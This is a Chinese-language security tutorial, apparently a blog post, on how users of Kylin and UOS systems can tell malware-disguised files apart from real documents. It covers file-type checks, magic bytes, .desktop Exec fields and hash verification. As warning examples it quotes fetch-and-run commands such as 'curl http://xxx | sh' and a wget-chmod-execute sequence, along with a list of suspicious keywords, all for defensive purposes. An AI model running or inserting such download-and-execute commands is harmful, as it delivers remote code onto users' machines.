信创系统(麒麟、统信等)如何识别病毒伪装文件?

📅 2026/7/6 14:17:31
信创系统(麒麟、统信等)如何识别病毒伪装文件?
原文链接信创系统麒麟、统信等如何识别病毒伪装文件在Windows上很多人习惯通过文件后缀判断文件类型比如.jpg是图片.docx是文档.exe是程序。但在信创系统中只看文件名和后缀是不可靠的。一个文件完全可以叫做照片.jpg但它真实内容可能是一个ELF可执行程序也可以叫做通知.pdf实际却是一个Shell脚本。所以在信创系统上识别病毒伪装文件核心思路不是看“它叫什么”而是看“它到底是什么”。一、病毒伪装文件常见的几种方式信创系统下常见的伪装方式主要有以下几类。第一种是后缀伪装。例如工资表.pdf ​ 照片.jpg ​ 系统补丁.deb表面看是文档、图片或安装包但实际可能是脚本、二进制程序或恶意压缩包。第二种是双后缀伪装。例如合同.pdf.sh ​ 发票.jpg.desktop ​ 安装包.tar.gz.run如果文件管理器隐藏了部分后缀用户可能只看到前半部分从而误以为它是正常文件。第三种是图标伪装。在信创系统桌面环境中.desktop文件可以设置图标和名称。它看起来可能像一个PDF、图片或安装器但里面的Exec字段实际可以执行命令。Desktop Entry规范中Exec字段本身就是用于定义要执行的命令行。第四种是权限伪装。文件名看起来像普通文档但如果它带有执行权限就需要特别注意。信创系统中文件是否可执行不取决于后缀而和文件权限、文件内容、解释器声明等有关。chmod修改的就是文件的mode bits也就是权限位。二、第一步不要双击先看文件属性拿到一个可疑文件后不建议直接双击打开尤其是来源不明的压缩包、脚本、安装包、.desktop文件先用ls -l查看权限pdsywpdsyw1024:~/桌面$ ls -ltr 发票.pdf ​ -rwxrwxr-x 1 pdsyw pdsyw 33 7月 2 16:06 发票.pdf ​这里最关键的是前面的x。如果一个看起来像PDF、图片、Word文档的文件却带有执行权限就要提高警惕。常见判断-rw-r--r-- 普通文件一般不可执行 ​ -rwxr-xr-x 带执行权限如果文件名是发票.pdf但权限是-rwxr-xr-x它就不像一个正常PDF。三、第二步用file命令识别真实类型信创系统下判断文件真实类型最常用的是file命令。pdsywpdsyw1024:~/桌面$ file 发票.pdf ​ 发票.pdf: PDF document, version 1.7 这说明它确实像一个PDF文件。但如果返回 pdsywpdsyw1024:~/桌面$ file 发票.pdf ​ 发票.pdf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]7d026cc7fb49d0ea330fcaeffef807066713cb88, for GNU/Linux 3.2.0, not stripped 那就说明这个所谓的pdf实际是Linux可执行程序。如果返回 ​ pdsywpdsyw1024:~/桌面$ file 发票.pdf ​ 发票.pdf: Bourne-Again shell script, ASCII text executable ​ 那就说明这个所谓的图片其实是Shell脚本。 ​ file命令并不是简单看后缀而是基于文件内容、magic数据库等方式判断文件类型libmagic手册也说明了相关函数会使用magic database来识别文件。详细可参考文章四、第三步用file -i查看MIME类型除了普通的file还可以用file -i正常PDF可能显示 ​ pdsywpdsyw1024:~/桌面$ file -i 发票.pdf ​ 发票.pdf: application/pdf; charsetbinary如果是脚本可能显示 ​ pdsywpdsyw1024:~/桌面$ file -i 发票.pdf ​ 发票.pdf: text/x-shellscript; charsetus-ascii 这就很明显了名字是PDF但MIME类型却是Shell脚本。详细可参考文章在桌面环境中也可以使用 ​ pdsywpdsyw1024:~/桌面$ xdg-mime query filetype 发票.pdf ​ application/pdf xdg-mime query filetype FILE的作用就是返回文件的MIME类型。五、第四步查看文件头识别“真身”很多文件都有固定的文件头也叫magic number。比如文件类型常见文件头PNG 图片89 50 4E 47PDF 文档%PDFZIP 压缩包50 4BELF 可执行文件7F 45 4C 46可以用下面命令查看文件开头内容 ​ pdsywpdsyw1024:~/桌面$ head -c 16 发票.pdf | xxd ​ 00000000: 2550 4446 2d31 2e37 0a25 a1b3 c5d7 0a31 %PDF-1.7.%.....1 ​ 如果看到%PDF说明它比较符合PDF特征。pdsywpdsyw1024:~/桌面$ head -c 16 发票.pdf | xxd ​ 00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............ ​ 如果看到7f 45 4c 46这就是ELF文件头也就是Linux下常见的可执行程序格式。这一步特别适合判断“图片伪装成程序”“文档伪装成脚本”这类问题。详细可参考文章六、第五步重点检查.desktop文件在信创桌面系统中.desktop文件需要特别注意。它可能看起来像普通软件快捷方式也可能被伪装成文档、图片、安装器。检查方式如下pdsywpdsyw1024:~/桌面$ cat 发票.desktop ​ [Desktop Entry] ​ TypeApplication ​ Name发票 ​ Exec/tmp/.update/run.sh ​ Iconapplication-pdf ​ Terminalfalse其中最关键的是Exec如果Exec后面执行的是奇怪路径、隐藏目录、临时目录、下载目录里的脚本就要非常警惕。例如Execbash -c curl http://xxx/1.sh | sh这种就非常危险因为它不是打开文档而是在执行远程脚本。对于.desktop文件建议重点检查pdsywpdsyw1024:~/桌面$ grep -E ^(Name|Type|Exec|Icon|Terminal) 发票.desktop ​ TypeApplication ​ Name发票 ​ Exec/tmp/.update/run.sh ​ Iconapplication-pdf ​ Terminalfalse 如果看起来是文档但TypeApplication并且存在Exec命令就不能当普通文件处理。七、第六步查看脚本内容如果file识别出它是脚本可以先查看前几行pdsywpdsyw1024:~/桌面$ head 发票.pdf ​ curl http://xxx | sh ​ chmod x /tmp/a常见脚本开头可能是#!/bin/bash ​ #!/bin/sh ​ #!/usr/bin/python3可疑内容包括curl http://xxx | sh ​ wget http://xxx -O /tmp/a ​ chmod x /tmp/a ​ /tmp/a ​ rm -rf ​ base64 -d ​ crontab ​ systemctl enable这些命令不一定都是病毒但如果它们出现在来源不明的文件中就要重点排查。尤其是以下组合非常可疑下载文件加执行权限立即运行例如wget http://example.com/a -O /tmp/.x ​ chmod x /tmp/.x ​ /tmp/.x这种逻辑很像恶意脚本常见的落地执行流程。八、第七步计算哈希值确认文件是否被篡改对于安装包、离线包、补丁包可以计算SHA256值pdsywpdsyw1024:~/桌面$ sha256sum wemeet_3.26.10.401_amd64.deb ​ ce069355bc4721d1b0685218962130ea4d739c90d5c63331272bdb38840486ed wemeet_3.26.10.401_amd64.deb sha256sum 的作用就是计算或校验SHA256摘要。如果软件官网或厂商提供了SHA256值可以进行比对。如果哈希值不一致说明文件可能被替换、损坏或篡改不建议继续安装。九、第八步使用杀毒工具扫描信创系统不是没有病毒只是病毒形态和Windows不完全一样。可以对文件进行病毒扫描需要注意的是杀毒工具不是万能的识别病毒伪装文件仍然要结合文件来源、文件类型、权限、行为、哈希值一起判断。十、建议养成的安全习惯第一不要只看文件名和图标。第二不要随便给文件加执行权限。第三不要直接运行来源不明的脚本。第四压缩包解压后先检查文件类型和权限。第五安装包优先从官网、应用商店、可信软件源获取。第六重要软件安装前核对哈希值。第七对.desktop、.sh、.run、无后缀文件保持警惕。第八发现可疑文件后先隔离再分析不要直接删除所有痕迹避免后续无法溯源。